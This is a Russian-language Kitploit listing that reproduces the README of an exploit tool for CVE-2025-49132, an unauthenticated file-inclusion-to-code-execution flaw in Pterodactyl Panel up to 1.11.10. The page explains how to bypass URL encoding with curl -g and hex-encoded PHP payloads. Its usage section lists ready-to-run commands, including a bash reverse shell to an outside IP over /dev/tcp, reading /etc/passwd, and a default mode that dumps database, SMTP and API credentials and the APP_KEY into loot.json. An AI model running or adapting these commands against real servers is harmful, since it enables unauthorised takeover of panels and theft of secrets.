Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-49132 — Эксплойт для Pterodactyl Panel ≤ 1.11.10 - неавторизованный LFI до RCE. | Kitploit
Инструменты/GitHubGitHub/yoyochaud/cve-2025-49132
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubyoyochaud/cve-2025-49132

CVE-2025-49132

Эксплойт для Pterodactyl Panel ≤ 1.11.10 - неавторизованный LFI до RCE.

Репозиторий
2516 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-49132 - Pterodactyl Panel Неаутентифицированное RCE

root@kitploit:~
  ___ __   __ ___      ___   ___  ___  ___        _  _   ___  _  ____  ___ 
 / __|\ \ / /| __|___ |_  ) / _ \|_  )| __|___   | || | / _ \| ||__ / |_  )
| (__  \ V / | _|___|  / / | (_) |/ / |__ \___|  |_  _| \_, /| ||_ \  / / 
 \___|  \_/  |___|    /___| \___//___||___/        |_|   /_/ |_|___/ /___|

Эксплойт для Pterodactyl Panel ≤ 1.11.10 - неаутентифицированное LFI с возможностью RCE.

Уязвимость

Конечная точка /locales/locale.json принимает параметры locale и namespace, которые передаются напрямую в PHP-функцию include() без санитизации или аутентификации. Параметр hash, предназначенный для предотвращения злоупотреблений, в незапатченных версиях не проверяется.

Это позволяет:

  • Local File Inclusion (LFI) - Чтение любого PHP-конфигурационного файла (учётные данные БД, APP_KEY, почта, сессии...)
  • Remote Code Execution (RCE) - Через включение pearcmd.php (трюк register_argc_argv + config-create), цепочки PHP-фильтров или десериализацию Laravel с утёкшим APP_KEY

Затрагивает: Pterodactyl Panel ≤ 1.11.10 Исправлено в: 1.11.11

Зачем этот PoC?

Оригинальные PoC используют Python requests для отправки нагрузки pearcmd. Проблема: requests молча URL-кодирует символы вроде <, >, {, } - это ломает PHP-теги (<?=system(...)?>), встроенные в URL.

Этот эксплойт исправляет это двумя ключевыми изменениями:

  1. curl для этапа 1 - Запрос на создание нагрузки использует curl -g (globoff) через subprocess, полностью обходя URL-кодирование Python.
  2. hex2bin() для кодирования команды - Вместо внедрения сырой команды (которая ломается на пробелах и спецсимволах) команда кодируется в hex и декодируется на стороне сервера с помощью system(hex2bin('...')). Hex использует только символы 0-9a-f - никаких +, =, &, пробелов. Это позволяет выполнять любые команды, включая реверс-шеллы с >& и /dev/tcp/.
  3. Динамический путь PEAR - В отличие от многих статических скриптов, которые жёстко прописывают /usr/share/php, этот инструмент полностью поддерживает аргумент --pear-dir. Он динамически подставляет пользовательский путь в сырой curl-запрос, позволяя эксплуатировать цели с нестандартными конфигурациями.
  4. Всё в одной автоматизации - Вместо отдельных скриптов для разных векторов этот инструмент полностью автоматизирует всю поверхность атаки (pearcmd, PHP-фильтры, десериализация, LFI .php), проверяя все возможности для гарантированного получения самого надёжного пути RCE.

Установка

root@kitploit:~
pip install requests

Опционально (для методов RCE через цепочки фильтров / десериализацию):

root@kitploit:~
pip install pycryptodome
git clone https://github.com/synacktiv/php_filter_chain_generator

Использование

RCE

root@kitploit:~
# Simple command
python3 exploit.py http://panel.fr --rce-cmd "id"

# PHP filter chain (needs php_filter_chain_generator in PATH)
python3 exploit.py http://panel.fr --rce-filter "id"

# Pre-generated filter chain
python3 exploit.py http://panel.fr --rce-filter "id" --filter-chain "php://filter/..."

# Laravel deserialization via leaked APP_KEY (needs phpggc + pycryptodome)
python3 exploit.py http://panel.fr --rce-d "id"

# RCE with another pear directory
python3 exploit.py http://panel.fr --rce-cmd "cat /etc/passwd" --pear-dir /usr/share/php/PEAR

# Reverse shell 
python3 exploit.py http://panel.fr --rce-cmd "/bin/bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"

Полный дамп конфигурации (режим по умолчанию)

root@kitploit:~
# Dumps all configs (DB creds, APP_KEY, mail, session, CORS…) + attempts auto RCE
python3 exploit.py http://panel.fr

Параметры

Типичные значения --pear-dir

ДистрибутивПуть

Что дампит режим по умолчанию

При запуске без --rce-cmd / --rce-filter / --rce-d эксплойт выполняет полное извлечение конфигурации:

  • База данных - хост, порт, пользователь, пароль MySQL, имя базы данных + конфигурация Redis
  • Приложение - APP_KEY (→ десериализация Laravel), версия, окружение, режим отладки
  • Pterodactyl - специфичные настройки панели, конфигурация 2FA, функциональные флаги
  • Сессия - драйвер, настройки cookie, параметры шифрования
  • Аутентификация - конфигурация блокировки, срок действия сброса пароля
  • Сервисы - внешние ключи API (Mailgun, Postmark и др.)
  • Почта - учётные данные SMTP, конфигурация почтовой программы
  • Очередь / Кэш / Хэширование / CORS / Логирование / Файловые системы
  • Чувствительные файлы - попытка чтения /etc/passwd, имени хоста, версии ядра

Полный отчёт в формате JSON сохраняется в loot.json (или по пользовательскому пути через -o).

Благодарности

Этот эксплойт является улучшением на основе PoC от GRodolphe/CVE-2025-49132_poc, который, в свою очередь, вдохновлён оригинальным PoC от 0xtensho/CVE-2025-49132-poc.

Скачать инструмент
ПараметрОписание
targetURL цели (например, http://panel.pterodactyl.fr)
--rce-cmd CMDВыполнить CMD через pearcmd (поддерживает любые команды, включая реверс-шеллы)
--rce-filter CMDВыполнить CMD через цепочку PHP-фильтров
--filter-chain CHAINИспользовать предварительно сгенерированную цепочку php://filter (с --rce-filter)
--rce-d CMDВыполнить CMD через десериализацию Laravel
--pear-dir PATHПуть к директории pearcmd.php (по умолчанию: /usr/share/php)
--timeout NТайм-аут запроса в секундах (по умолчанию: 10)
--verify-sslВключить проверку SSL-сертификата (по умолчанию отключена)
-o FILEФайл отчёта (по умолчанию: loot.json)
Debian / Ubuntu
/usr/share/php (по умолчанию)
openSUSE/usr/share/php/PEAR
Alpine/usr/share/php84 или /usr/share/php83
RHEL / Rocky/usr/share/pear